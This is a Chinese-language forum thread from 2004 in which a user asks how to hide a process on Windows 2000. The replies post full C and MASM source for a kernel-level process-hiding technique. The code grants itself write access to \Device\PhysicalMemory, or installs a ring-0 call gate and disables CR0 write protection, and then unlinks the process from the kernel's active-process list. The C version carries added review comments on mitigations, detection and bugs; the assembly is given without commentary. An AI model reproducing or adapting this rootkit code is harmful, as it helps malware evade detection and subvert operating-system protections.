请高手指点
我想在W2000隐藏自己的进程。
发布于:2004-03-22 13:39
用"文章搜索", 以前有文章讲得很详细。
发布于:2004-03-22 15:13
/*
Before the explanation, a few words about some structures. The process
executive block contains several process-related linked lists, one of which
is the active-process list. One important use of this list is to be walked
when querying system information, to enumerate the currently active
processes; interestingly, M$ probably kept it out of the kernel process block
for efficiency reasons, meaning operations such as process/thread switching
do not use it, and so rewriting it should not cause any problem that cannot
be ignored (this is the basis of this approach). What to do is then obvious:
just remove the process you want to hide from the doubly-linked
active-process list; kernel debuggers (such as softice/proc) will not find it
either. The code for hiding the current process under 2000 is as follows:
*/

/*
 * Review notes (the code below is reproduced unchanged; only comments added).
 *
 * What it is: a user-mode DKOM (direct kernel object manipulation) program.
 * It opens the \Device\PhysicalMemory section, grants itself
 * SECTION_MAP_WRITE on it if the open is denied, maps the page directory at
 * a hard-coded physical address, translates kernel virtual addresses by
 * walking the page tables itself (LinearToPhys), and finally unlinks the
 * calling process from the active-process list (HideProcessAtAll).
 *
 * Platform coupling: every address and offset is hard-coded for 32-bit
 * Windows 2000 / XP builds (page directory 0x30000 / 0x39000, thread pointer
 * 0xFFDFF124, process pointer at thread+0x44, list links at +0xa0/+0xa4 or
 * +0x88/+0x8c) and LinearToPhys assumes non-PAE two-level paging (10/10/12
 * split, see the >>22 and 0x003FF000 masks). On any other build or with
 * /PAE the writes land on arbitrary physical memory, i.e. the likely
 * outcome is a crash rather than a hidden process.
 *
 * Mitigation status: Windows Server 2003 SP1 and later Windows releases
 * refuse user-mode opens of \Device\PhysicalMemory entirely, so on any
 * supported Windows the first ZwOpenSection fails and the DACL rewrite
 * never helps. The approach also needs an account that already holds
 * WRITE_DAC on the section (in practice an administrator).
 *
 * Detection: the process is only removed from one list; its PID, handle
 * table entries and running threads remain, so cross-view checks (walk the
 * process list and compare with a scan for process objects or with
 * per-PID lookups, as memory-forensics "pslist vs psscan" does) expose it.
 * A DACL on \Device\PhysicalMemory that grants SECTION_MAP_WRITE to an
 * ordinary user, or an audit record for SetSecurityInfo on that object, is
 * itself a strong indicator.
 *
 * Code defects a reviewer would note (not fixed here): the three
 * `if(dwRes=...!=ERROR_SUCCESS)` tests bind as `dwRes = (call != ERROR_SUCCESS)`
 * because of precedence (control flow is unaffected, dwRes is unused);
 * LinearToPhys leaks the mapped page-table view when the PTE is not present;
 * GetData/SetData treat a failed translation (phys == 0) as physical page 0;
 * exeception() is declared to return long but never returns a value;
 * HideProcessAtAll returns TRUE even when InitNTDLL fails.
 */
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

/* Native-API types that the SDK headers of the time did not expose. */
typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

/* OBJ_* attribute flags; only defined, none of them is used below
   (attributes.Attributes is set to 0). */
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

/* Function-pointer types for the two ntdll exports resolved at runtime. */
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;

HMODULE g_hNtDLL = NULL;            /* ntdll.dll module handle (InitNTDLL/CloseNTDLL) */
PVOID g_pMapPhysicalMemory = NULL;  /* view of the page directory page (OpenPhysicalMemory) */
HANDLE g_hMPM = NULL;               /* handle to \Device\PhysicalMemory */
OSVERSIONINFO g_osvi;               /* filled by OpenPhysicalMemory, read again by HideProcessAtAll */

/*
 * Loads ntdll.dll and resolves RtlInitUnicodeString / ZwOpenSection.
 * Returns FALSE only if LoadLibrary fails; a NULL result from either
 * GetProcAddress is not checked and would be called later as NULL.
 */
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary( "ntdll.dll" );
    if ( !g_hNtDLL )
    {
        return FALSE;
    }
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
    return TRUE;
}

/* Releases the ntdll.dll handle taken by InitNTDLL and clears the global. */
VOID CloseNTDLL()
{
    if(g_hNtDLL != NULL)
    {
        FreeLibrary(g_hNtDLL);
    }
    g_hNtDLL = NULL;
}

/*
 * Rewrites the DACL of hSection (opened with READ_CONTROL|WRITE_DAC) to add
 * an ACE granting SECTION_MAP_WRITE to "CURRENT_USER", the special trustee
 * name SetEntriesInAcl resolves to the calling user. Failures are not
 * reported: every error path just jumps to CleanUp, and dwRes is never read.
 * Note the precedence in each `if(dwRes=call!=ERROR_SUCCESS)`: dwRes receives
 * the comparison result, not the error code.
 */
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl=NULL;
    PACL pNewDacl=NULL;
    PSECURITY_DESCRIPTOR pSD=NULL;
    DWORD dwRes;
    EXPLICIT_ACCESS ea;

    if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
    {
        goto CleanUp;
    }

    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";

    if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
    {
        goto CleanUp;
    }

    if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
    {
        goto CleanUp;
    }

CleanUp:
    /* pSD and pNewDacl are LocalAlloc'd by the security APIs; pDacl points into pSD. */
    if(pSD) LocalFree(pSD);
    if(pNewDacl) LocalFree(pNewDacl);
}

/*
 * Opens \Device\PhysicalMemory for read/write and maps one 4 KiB page at
 * the hard-coded physical address of the kernel page directory for the
 * detected OS version (only major version 5, minor 0 or 1, is accepted;
 * anything else returns NULL). If the first open is denied, the section
 * is reopened with READ_CONTROL|WRITE_DAC, its DACL is loosened by
 * SetPhyscialMemorySectionCanBeWrited, and the open is retried.
 * On success the mapping is left in g_pMapPhysicalMemory and the handle
 * in g_hMPM (also returned). The result of the WRITE_DAC open is not
 * checked before use.
 */
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory ;

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
    if (g_osvi.dwMajorVersion != 5)
        return NULL;
    switch(g_osvi.dwMinorVersion)
    {
        case 0: PhyDirectory=0x30000; break; //2k
        case 1: PhyDirectory=0x39000; break; //xp
        default: return NULL;
    }

    RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );

    attributes.Length= sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory= NULL;
    attributes.ObjectName= &physmemString;
    attributes.Attributes= 0;
    attributes.SecurityDescriptor= NULL;
    attributes.SecurityQualityOfService= NULL;

    status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
    if(status == STATUS_ACCESS_DENIED)
    {
        /* Denied: grant ourselves write access on the section, then retry.
           This step is exactly what later Windows releases block. */
        status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
    }

    if( !NT_SUCCESS( status ))
    {
        return NULL;
    }

    g_pMapPhysicalMemory = MapViewOfFile( g_hMPM,
                                          FILE_MAP_READ|FILE_MAP_WRITE, //MAP_READWRITE
                                          0, PhyDirectory, 0x1000);
    if( g_pMapPhysicalMemory == NULL )
    {
        return NULL;
    }
    return g_hMPM;
}

/*
 * Translates virtual address addr to a physical address using the page
 * directory mapped at BaseAddress. Assumes classic 32-bit non-PAE paging:
 * bits 31..22 index the directory, bits 21..12 the page table, bits 11..0
 * the page. Bit 0 of an entry is "present", bit 7 of a PDE is "4 MiB page".
 * Returns 0 when the PDE or PTE is not present. The page-table page is
 * mapped through g_hMPM (4 == FILE_MAP_READ) and is unmapped only on the
 * success path; the not-present-PTE path leaks the view.
 */
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
    ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
    PGDE=BaseAddress[VAddr>>22];
    if ((PGDE&1)!=0)
    {
        ULONG tmp=PGDE&0x00000080;
        if (tmp!=0)
        {
            /* large (4 MiB) page: physical = PDE frame + 22-bit offset */
            PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
        }
        else
        {
            PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
            PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
            if ((PTE&1)!=0)
            {
                PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
                UnmapViewOfFile((PVOID)PGDE);
            }
            else return 0;
        }
    }
    else return 0;
    return (PVOID)PAddr;
}

/*
 * Reads one 32-bit value at kernel virtual address addr through the
 * physical-memory section. Returns 0 both when the page cannot be mapped
 * and when the stored value is 0, so callers cannot tell failure apart;
 * if LinearToPhys fails (phys == 0) the read silently comes from physical
 * page 0.
 */
ULONG GetData(PVOID addr)
{
    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
    //ULONG phys=LinearAddressToPhysicalAddress((unsigned long)addr);
    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (tmp==0) return 0;
    ULONG ret=tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}

/*
 * Writes one 32-bit value at kernel virtual address addr through the
 * physical-memory section. Same failure semantics as GetData: a failed
 * translation makes the write land in physical page 0. Returns FALSE only
 * if the page view cannot be created.
 */
BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (tmp==0) return FALSE;
    tmp[(phys & 0xFFF)>>2]=data;
    UnmapViewOfFile(tmp);
    return TRUE;
}

/*
 * Unlinks the calling process from the active-process list.
 * Reads the current-thread pointer from the hard-coded address 0xFFDFF124
 * (the author's "kteb"), the process pointer at thread+0x44 ("kpeb"), then
 * the forward/backward links at a version-specific offset, and splices the
 * neighbours together: fw->Blink = bw (SetData(fw+4, bw)) and bw->Flink = fw
 * (SetData(bw, fw)). The process's own links are left untouched. No result
 * of GetData/SetData is checked, and the function returns TRUE even when
 * InitNTDLL fails (the whole body is skipped). Side effects: g_hMPM is
 * closed and ntdll unloaded on the path that ran.
 */
BOOL HideProcessAtAll()
{
    if (InitNTDLL())
    {
        ULONG fw,bw;
        if (OpenPhysicalMemory()==0)
        {
            return FALSE;
        }
        ULONG thread=GetData((PVOID)0xFFDFF124); //kteb
        ULONG process=GetData(PVOID(thread+0x44)); //kpeb
        /* list-link offsets differ between the 2000 (minor 0) and XP (minor 1) layouts */
        if (g_osvi.dwMinorVersion == 0)
            fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4));
        if (g_osvi.dwMinorVersion ==1)
            fw=GetData(PVOID(process+0x88)),bw=GetData(PVOID(process+0x8c));
        SetData(PVOID(fw+4),bw);
        SetData(PVOID(bw),fw);
        CloseHandle(g_hMPM);
        CloseNTDLL();
    }
    return TRUE;
}

/*
 * Unhandled-exception filter: any fault (e.g. an access violation caused by
 * a wrong hard-coded address) shows a message box and terminates the
 * process. Declared to return long but relies on ExitProcess not returning.
 */
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
    MessageBox(0,"error","error",0);
    ExitProcess(0);
}

/* Installs the exception filter, runs the unlink, then reports "OK"
   regardless of whether HideProcessAtAll succeeded (its result is ignored). */
int main(int argc,char*argv[])
{
    SetUnhandledExceptionFilter(exeception);
    HideProcessAtAll();
    MessageBox(0,"OK","OK",0);
    return 0;
}
发布于:2004-03-22 15:14
.686p
.model flat, stdcall option casemap :none ; case sensitive ; ######################################################################### include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\advapi32.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\advapi32.lib DEBUG = TRUE HMODULE typedef dword NTSTATUS typedef dword PACL typedef dword PSECURITY_DESCRIPTOR typedef dword OBJ_INHERIT=2 OBJ_PERMANENT=10h OBJ_EXCLUSIVE=20h OBJ_CASE_INSENSITIVE=40h OBJ_OPENIF=80h OBJ_OPENLINK =100h OBJ_KERNEL_HANDLE=200 OBJ_VALID_ATTRIBUTES=3F2h SE_KERNEL_OBJECT = 6 GRANT_ACCESS =1 NO_INHERITANCE =0 TRUSTEE_IS_NAME=1 TRUSTEE_IS_USER=1 STATUS_SUCCESS =0 STATUS_ACCESS_DENIED =0C0000022h STATUS_ACCESS_VIOLATION equ 0C0000005h STATUS_INFO_LENGTH_MISMATCH equ 0C0000004h SystemModuleInformation equ 11 PVOID TYPEDEF DWORD UNLONG TYPEDEF DWORD CHAR TYPEDEF BYTE UNICODE_STRING struct nLength word ? MaximumLength word ? Buffer dword ? UNICODE_STRING ends OBJECT_ATTRIBUTES struct nLength dword ? RootDirectory HANDLE ? ObjectName dword ?;PUNICODE_STRING Attributes dword ?; SecurityDescriptor dword ?; PVOID // Points to type SECURITY_DESCRIPTOR SecurityQualityOfService dword ?;PVOID // Points to type SECURITY_QUALITY_OF_SERVICE OBJECT_ATTRIBUTES ends TRUSTEE struct pMultipleTrustee dword ?;PTRUSTEE MultipleTrusteeOperation dword ?; MULTIPLE_TRUSTEE_OPERATION TrusteeForm dword ?;TRUSTEE_FORM TrusteeType dword ?;TRUSTEE_TYPE ptstrName dword ?;LPTSTR TRUSTEE ends EXPLICIT_ACCESS struct grfAccessPermissions DWORD ? grfAccessMode dword ? ;ACCESS_MODE grfInheritance DWORD ? ; Trustee TRUSTEE <> ; EXPLICIT_ACCESS ends MyGATE struct ;门结构类型定义 OFFSETL WORD ? ;32位偏移的低16位 SELECTOR WORd ? ;选择子 DCOUNT BYTE ? ;双字计数字段 GTYPE BYTE ? ;类型 OFFSETH WORD ? 
;32位偏移的高16位 MyGATE ends SetPhyscialMemorySectionCanBeWrited proto :dword MiniMmGetPhysicalAddress proto :dword ENTERRING0 macro pushad pushfd cli mov eax,cr0 ;get rid off readonly protect and eax,0fffeffffh mov cr0,eax endm LEAVERING0 macro mov eax,cr0 ;restore readonly protect or eax,10000h mov cr0,eax sti popfd popad retf endm UNICODE_STR macro str irpc _c,<str> db '&_c' db 0 endm endm .data? GdtLimit dw ? GdtAddr dd ? mapAddr dd ? OldEsp dd ? ProcessOffset dd ? g_osvi OSVERSIONINFO<?> .data align 4 objname dw objnamestr_size,objnamestr_size+2 objnameptr dd 0 objnamestr equ this byte UNICODE_STR <\Device\PhysicalMemory> objnamestr_size equ $-objnamestr align 4 ObjAttr db 24 dup (0) IsIdtFlag dd 0 IsNt dd 0 IsXp dd 0 Callgt dq 0 ;call gate's sel:off Caption db 'Hide Process',0 Text db "Can you see me?",0 .code SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE local pDacl: PACL local pNewDacl:PACL local pSD :PSECURITY_DESCRIPTOR local dwRes:DWORD ; local ea:EXPLICIT_ACCESS ; invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\ NULL,NULL, addr pDacl,NULL, addr pSD cmp eax,ERROR_SUCCESS jz @f jmp OutSet @@: mov dwRes,eax mov ea.grfAccessPermissions ,SECTION_MAP_WRITE;2 mov ea.grfAccessMode ,GRANT_ACCESS;1 mov ea.grfInheritance,NO_INHERITANCE;0 mov ea.Trustee.pMultipleTrustee,0 mov ea.Trustee.MultipleTrusteeOperation,0 mov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME;1 mov ea.Trustee.TrusteeType,TRUSTEE_IS_USER;1 call @f db "CURRENT_USER",0 @@: pop edx mov ea.Trustee.ptstrName,edx invoke SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl cmp eax,ERROR_SUCCESS jz @f jmp OutSet @@: invoke SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\ NULL,NULL,pNewDacl,NULL OutSet: cmp pSD,0 jz @f invoke LocalFree,pSD @@: cmp pNewDacl,0 jz @f invoke LocalFree,pNewDacl @@: ret SetPhyscialMemorySectionCanBeWrited endp MiniMmGetPhysicalAddress proc virtualaddress:dword mov eax,virtualaddress cmp eax,80000000h jb @f cmp 
eax,0a0000000h jae @f and eax,1FFFF000h ret @@: mov eax,0 ret MiniMmGetPhysicalAddress endp ExecRing0Proc proc local tmpSel:dword local setcg:dword local BaseAddress:dword local NtdllMod :dword local hSection:HANDLE local status:NTSTATUS local objectAttributes:OBJECT_ATTRIBUTES local objName:UNICODE_STRING mov status,STATUS_SUCCESS; sgdt GdtLimit invoke MiniMmGetPhysicalAddress,GdtAddr mov mapAddr,eax test eax,eax jz Exit1 call @f db "Ntdll.dll",0 @@: call LoadLibraryA mov NtdllMod,eax lea edx,objnamestr mov objnameptr,edx lea edi,ObjAttr and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail push edi ;edi->ObjAttr push 24 ;length of <\Device\PhysicalMemory> pop ecx push ecx xor eax,eax rep stosb ;put ObjAttr with 0 pop ecx pop edi mov esi,edi stosd mov dword ptr[esi],ecx stosd lea eax,[edx-8] ;eax->objname stosd ;ObjAddr(18h,00,00,00,00,00,00,00,offset objname,40,02,00,00,dd 2 dup(0) mov dword ptr [edi],240h call @f db "ZwOpenSection",0 @@: push NtdllMod call GetProcAddress mov ebx,eax ;ebx=ZwOpenSection push esi ;esi->ObjAttr push SECTION_MAP_READ or SECTION_MAP_WRITE lea edi,hSection push edi ;edi->hSection call eax ;ZwOpenSection(&hSection,SECTION_MAP_READ or SECTION_MAP_WRITE,ObjAttr) mov status,eax cmp status,STATUS_ACCESS_DENIED jnz AccessPermit mov eax,ebx push esi push READ_CONTROL or WRITE_DAC push edi call eax mov status,eax invoke SetPhyscialMemorySectionCanBeWrited,hSection call @f db "ZwClose",0 @@: push NtdllMod call GetProcAddress push hSection call eax ;zwClose hSection mov eax,ebx push esi push SECTION_MAP_READ or SECTION_MAP_WRITE lea edi,hSection push edi call eax mov status ,eax ;status =ZwOpenSection(&hSection,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&objectAttributes); AccessPermit: cmp status ,STATUS_SUCCESS jz @f ;printf("Error Open PhysicalMemory Section Object,Status:%08X\n",status); ;return 0; mov eax,0 ret @@: movzx eax,word ptr[GdtLimit] inc eax invoke MapViewOfFile,hSection, FILE_MAP_READ or FILE_MAP_WRITE, 0, mapAddr, \ eax mov 
BaseAddress,eax cmp BaseAddress,0 jnz @f ;printf("Error MapViewOfFile:"); ;PrintWin32Error(GetLastError()); return 0; mov eax,0 ret @@: mov esi,eax ;esi->gdt base mov ecx,3e0h mov eax,GdtAddr .if dword ptr [esi+ecx+2]!=0ec0003e8h mov byte ptr [esi],0c3h mov word ptr [esi+ecx],ax shr eax,16 mov word ptr [esi+ecx+6],ax mov dword ptr [esi+ecx+2],0ec0003e8h mov dword ptr [esi+ecx+8],0000ffffh mov dword ptr [esi+ecx+12],00cf9a00h .endif mov setcg,TRUE cmp setcg,0 jnz ChangeOK call @f db "ZwClose",0 @@: push NtdllMod call GetProcAddress push hSection call eax xor eax,eax ret ChangeOK: and dword ptr Callgt,0 xor eax,eax mov ax,3e0h or al,3h mov word ptr [Callgt+4],ax ;farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate; lea eax,_Ring0Proc ;invoke VirtualLock,eax,seglen test eax,eax jnz @f xor eax,eax ret @@: invoke GetCurrentThread invoke SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL mov eax,3e0h lar edx,eax jnz Ring3 invoke Sleep,0 call fword ptr [Callgt] ;use callgate to Ring0! _Ring0Proc: ; Ring0 code here.. mov eax,esp ;save ring0 esp mov esp,[esp+4];->ring3 esp push eax pushad mov eax,dword ptr ds:[0ffdff124h];kteb mov eax,[eax+44h] ;kpeb .if IsNt==1 mov ProcessOffset,0a0h .elseif IsXp==1 mov ProcessOffset,088h .endif mov ecx,ProcessOffset mov esi,dword ptr[eax+ecx] ;forword mov edi,dword ptr[eax+ecx+4] ;backword mov dword ptr[esi+4],edi mov dword ptr[edi],esi popad pop esp ;restore ring0 esp push offset Ring3 retf Ring0CodeLen=$-_Ring0Proc Ring3: invoke GetCurrentThread invoke SetThreadPriority,eax,THREAD_PRIORITY_NORMAL ;invoke VirtualUnlock,Entry,seglen call @f db "ZwClose",0 @@: push NtdllMod call GetProcAddress push hSection call eax mov eax,TRUE ret ExecRing0Proc endp main: assume fs:nothing push offset MySEH push fs:[0] mov fs:[0],esp mov OldEsp,esp mov ax,ds ;if Win9x? 
test ax,4 jnz Exit1 push esi lea esi,g_osvi assume esi:ptr OSVERSIONINFO mov [esi].dwOSVersionInfoSize,sizeof OSVERSIONINFO invoke GetVersionEx,addr g_osvi .if [esi].dwMajorVersion != 5 jmp Exit1 .endif .if [esi].dwMinorVersion==0 mov IsNt,1 .elseif [esi].dwMinorVersion==1 mov IsXp,1 .else jmp Exit1 .endif pop esi invoke ExecRing0Proc invoke MessageBoxA,0,addr Text,addr Caption,MB_OK Exit1: pop fs:[0] add esp,4 invoke ExitProcess,0 MySEH : mov esp,OldEsp pop fs:[0] add esp,4 invoke ExitProcess,-1 end main |